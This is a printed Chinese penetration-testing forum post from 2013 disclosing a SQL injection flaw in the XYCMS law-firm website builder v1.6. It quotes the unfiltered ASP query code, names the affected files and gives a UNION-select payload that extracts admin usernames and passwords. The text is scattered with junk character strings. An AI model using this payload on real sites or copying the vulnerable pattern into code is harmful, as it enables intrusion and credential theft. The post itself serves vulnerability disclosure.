中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似5 l" F5 D- O6 |

+ T5 j* ^8 P- K5 M, z1 a, Y淫荡分割线+ r( @  W$ h8 z7 M5 `
--------------------------------------------------------* O/ M  D/ b) S5 E/ c
! c0 L/ @; Q7 V. q
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)0 [, `: G+ M, `4 V- d7 H
源码地址:http://down.chinaz.com/soft/29233.htm" r8 M$ e' `  P
+ c! @- N6 j6 I, e
漏洞文件:shownews.asp
( `1 h& U; A$ V' k漏洞代码:7-13行
9 ~+ }% k0 c( D1 ^2 }% Y# t5 W% g
$ }" ~- K4 ]3 T  N: G/ } 7 |9 J! v0 n* V) s) V
<%
2 t" ^' A9 ~" N* }& C. ~id=request.QueryString("id")
3 E7 d& O2 I8 x2 m    ; Y4 a. C* G. @- R+ u
set snews=server.createobject("adodb.recordset") * A+ e) F6 O. p6 r' |6 T" ~
exec="select * from [news] where id="&id
* ^+ n, _0 L& D1 ~+ }snews.open exec,conn,1,1
) ~& D& W. |4 A$ U6 E%>
1 b9 _7 B1 I# M8 r  E4 p% r9 w. | ) S! z9 `6 s7 E4 b. W
% B4 r9 f' r) O% y
什么过滤都没有  直造成注入; e; p" C( _8 e1 ?! t$ Q

; ^  Z0 x2 k3 k* ]/ |# ~7 G. x6 T注入点:http://127.0.0.1:99/shownews.asp?id=xx- l& l' v0 ^5 r; o$ D
+ u6 Q1 R$ W4 Y1 W
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
& R# ?- g- z! L3 n5 M' t) x! A8 S" i* Q
0 K7 V4 P5 c* x2 `- n1 M% I
0 m+ e7 m* R* L! D8 B  eexp: union select 1,admin,password,4,5,7 from admin_user
6 p1 g0 R$ h5 p2 o2 S; E: d4 _/ s+ Q- l





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2